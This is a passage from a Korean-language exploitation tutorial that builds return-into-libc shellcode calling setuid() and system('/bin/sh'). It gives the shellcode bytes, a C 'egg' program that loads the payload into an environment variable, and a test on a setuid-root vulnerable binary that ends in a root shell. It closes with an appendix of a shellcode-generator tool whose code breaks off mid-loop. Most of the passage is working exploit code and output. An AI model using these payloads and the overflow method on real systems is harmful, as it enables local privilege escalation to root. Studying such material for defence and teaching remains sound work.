: 804842c: 55 push %ebp 804842d: 89 e5 mov %esp,%ebp 804842f: b8 a9 ec 12 40 mov $0x4012eca9,%eax 8048434: 50 push %eax 8048435: 31 c0 xor %eax,%eax 8048437: 50 push %eax 8048438: b8 98 b4 06 40 mov $0x4006b498,%eax 804843d: 50 push %eax 804843e: b8 e4 0a 0d 40 mov $0x400d0ae4,%eax 8048443: 50 push %eax 8048444: c3 ret 8048445: 5d pop %ebp 8048446: c3 ret 8048447: 90 nop 8048448: 90 nop ..... 3. 공격에 사용할 EGG 만들기 #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 1024 #define NOP 0x43 char shellcode[] = "\xb8\xa9\xec\x12\x40\x50\x31\xc0\x50\xb8\x98\xb4\x06\x40\x50\xb8\xe4\x0a\x0d\x40\x50\xc3"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } main() { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize; i++) buff[i] = NOP; ptr = buff + (bsize - strlen(shellcode) - 1); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); } 4. 취약 프로그램을 통한 테스트 [mutacker@note myshell]$ cat vul.c void a(char *ptr) { char buf[20]; strncpy(buf, ptr); printf("%s\n", buf); } main(int argc, char* argv[]) { a(argv[1]); return 1; } [mutacker@note myshell]$ gcc -o vul vul.c [mutacker@note myshell]$ ./vul `perl -e 'print "A"x39'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [mutacker@note myshell]$ ./vul `perl -e 'print "A"x40'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmention fault (core dumped) [mutacker@note myshell]$ ./egg Using address: 0xbffffc18 [mutacker@note myshell]$ ls -al /home/contest/vul -rwsr-xr-x 1 root root 13571 4월 11 03:06 /home/contest/vul [mutacker@note myshell]$ /home/contest/vul `perl -e 'print "A"x40, "\x18\xfc\xff\xbf"x2'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?웠sh-2.04# id uid=0(root) gid=500(mutacker) groups=500(mutacker) 4. 단점과 장점 이 쉘코드의 경우 쉘코드를 적용시키기 위해 매번 setuid(), system(), "/bin/sh"의 주소를 찾아야 하는 수고를 거쳐야 한다. (물론 dlopen(), dlsym() 등을 이용해 쉽게 찾는 방법도 많다.) 즉, 너무 공격용 시스템에 의존한다는 단점을 갖는다. 하지만, IDS와 같은 필터링에 유동성있게 반응할 수 있으며, 버퍼가 아주 작은 경우에 적용이 가능하다는 장점을 가지고 있다. 또한, 각 시스템에서 사용하는 시스템콜의 분석을 줄일수 있다는 장점도 같이 갖는다. 5. 결론 우리는 기존의 시스템콜을 분석 코드를 추출하여 만들던 쉘코드와는 다른 새로운 형태의 쉘코드를 만들어 보았다. 또한, 그 크기도 상당히 줄일 수 있다는 것을 확인하였다. 테스트를 해보지는 못했지만, 다양한 종류의 시스템에서 그대로 적용이 가능하리라 본다. 6. 참고 문서 - Omega project finished. (http://community.core-sdi.com/~juliano/lmagra-omega.txt 원 사이트가 현재 닫혀져 있음) - Advanced return-into-lib(c) exploits (PaX case study) (http://www.phrack.org/phrack/58/p58-0x04) 7. Appendix 자동화 생성툴( Coded by Saintlinu in Null@Root, 감사^^ ) #include #include #include #define DIFF 0x4000 #define LIBC "/lib/i686/libc.so.6" #define SCSOURCE "shellcode.c" #define SCBINARY "shellcode" #define SCDUMP "shellcodedump.txt" #define BACKUP "backup.txt" #define OBJDUMP "/usr/bin/objdump" #define GCC "/usr/bin/gcc" #define CAT "/bin/cat" #define GREP "/bin/grep" #define AWK "/bin/awk" #define CUT "/bin/cut" #define PERL "/usr/bin/perl" #define PERLFILE "extract" #define CHMOD "/bin/chmod" #define RM "/bin/rm" int main(int argc, char **argv) { FILE *fp; long shellStringAddress; char CMD[256], buffer[256], shellcodeBuffer[256]; long systemVar, setuidVar, setreuidVar; void *handle; int i, reuidVar; if(argc < 2) { puts("\nThis program is shellcode generator on the LINUX on x86"); puts(" Made by Saintlinu"); puts("\nWARNING : USE AT YOUR OWN RISK!!!\n"); printf("Usage : %s uid\n\n", argv[0]); exit(-1); } handle=dlopen(LIBC, RTLD_LAZY); setuidVar=(long)dlsym(handle,"setuid"); dlclose(handle); handle=dlopen(LIBC, RTLD_LAZY); systemVar=(long)dlsym(handle,"system"); dlclose(handle); handle=dlopen(LIBC, RTLD_LAZY); setreuidVar=(long)dlsym(handle,"setreuid"); dlclose(handle); reuidVar=atoi(argv[1]); setuidVar -= DIFF; setreuidVar -= DIFF; systemVar -= DIFF; /* To open file descriptor */ if((fp=fopen(SCSOURCE, "w")) < 0) { printf("File open error\n"); exit(-1); } /* find strings /bin/sh in system() */ shellStringAddress=systemVar; while((memcmp((void *)shellStringAddress, "/bin/sh", 8))) shellStringAddress++; // if not equal then result is larger than 1 shellStringAddress -= DIFF; /* To print about something */ puts("\nThis program is shellcode generator on the LINUX on x86"); puts(" Made by Saintlinu"); puts("\nWARNING : USE AT YOUR OWN RISK!!!\n"); puts("\n================================================="); puts("Calculating.....\n"); printf("setuid() address is 0x%x\n", setuidVar); printf("setreuid() address is 0x%x\n", setreuidVar); printf("system() address is 0x%x\n", systemVar); printf("\n\"/bin/sh\" strings address is 0x%x\n", shellStringAddress); puts("=================================================\n"); puts("Let's make a shellcode's binary ....\n"); /* To write shellcode in assembly language to shellcode.c */ if(reuidVar == 0) { fprintf(fp, "int main(int argc, char **argv)\n"); fprintf(fp, "{\n"); fprintf(fp, " __asm__ (\"\n"); fprintf(fp, " movl $0x%x, %s\n", shellStringAddress, "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " xor %s, %s\n", "%eax", "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " movl $0x%x, %s\n", systemVar, "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " movl $0x%x, %s\n", setuidVar, "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " ret\n"); fprintf(fp, " \");\n"); fprintf(fp, "}\n"); fclose(fp); } else { fprintf(fp, "int main(int argc, char **argv)\n"); fprintf(fp, "{\n"); fprintf(fp, " __asm__ (\"\n"); fprintf(fp, " movw $0x%x, %s\n", reuidVar, "%ax"); fprintf(fp, " movw %s, %s\n", "%ax", "%bx"); fprintf(fp, " push %s\n", "%ax"); fprintf(fp, " push %s\n", "%bx"); fprintf(fp, " push $0x18\n"); fprintf(fp, " int $0x80\n"); fprintf(fp, " movl $0x%x, %s\n", shellStringAddress, "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " xor %s, %s\n", "%eax", "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " movl $0x%x, %s\n", systemVar, "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " movl $0x%x, %s\n", setuidVar, "%eax"); fprintf(fp, " push %s\n", "%eax"); fprintf(fp, " ret\n"); fprintf(fp, " \");\n"); fprintf(fp, "}\n"); fclose(fp); } /* To make executive shellcode's object file using a "gcc" */ sprintf(CMD, "%s -o %s %s\n", GCC, SCBINARY, SCSOURCE); system(CMD); /* To make binary code with objdump */ sprintf(CMD, "%s -d %s > %s\n", OBJDUMP, SCBINARY, SCDUMP); system(CMD); /* To trim shellcode's dumpfile */ if(reuidVar == 0) { sprintf(CMD, "%s %s | %s -A 11 \"

\" > %s\n", CAT, SCDUMP, GREP, BACKUP); system(CMD); } else if(reuidVar != 0) { sprintf(CMD, "%s %s | %s -A 17 \"

\" > %s\n", CAT, SCDUMP, GREP, BACKUP); system(CMD); } /* To trim space from dumpfile and stuff */ sprintf(CMD, "%s %s | %s -d: -f2 | %s -d\" \" -f1-5 | %s \'{ print $1 $2 $3 $4 $5 }\' > %s\n", CAT, BACKUP, CUT, CUT, AWK, SCDUMP); system(CMD); /* To make a PERL file */ if((fp=fopen(PERLFILE, "w")) < 0) { printf("file write error\n"); exit(-1); } fprintf(fp, "#!%s -w\n open(SCFILE, '%s') || die $!;while() { chop($_); $shellcode .= $_; } print $shellcode;\n", PERL, SCDUMP); fclose(fp); sprintf(CMD, "%s +x %s\n", CHMOD, PERLFILE); system(CMD); sprintf(CMD, "./%s > %s\n", PERLFILE, BACKUP); system(CMD); /* To modify final stuff */ if((fp=fopen(BACKUP, "r")) < 0) { printf("file write error\n"); exit(-1); } bzero(buffer, sizeof(buffer), 0); for(i=0; i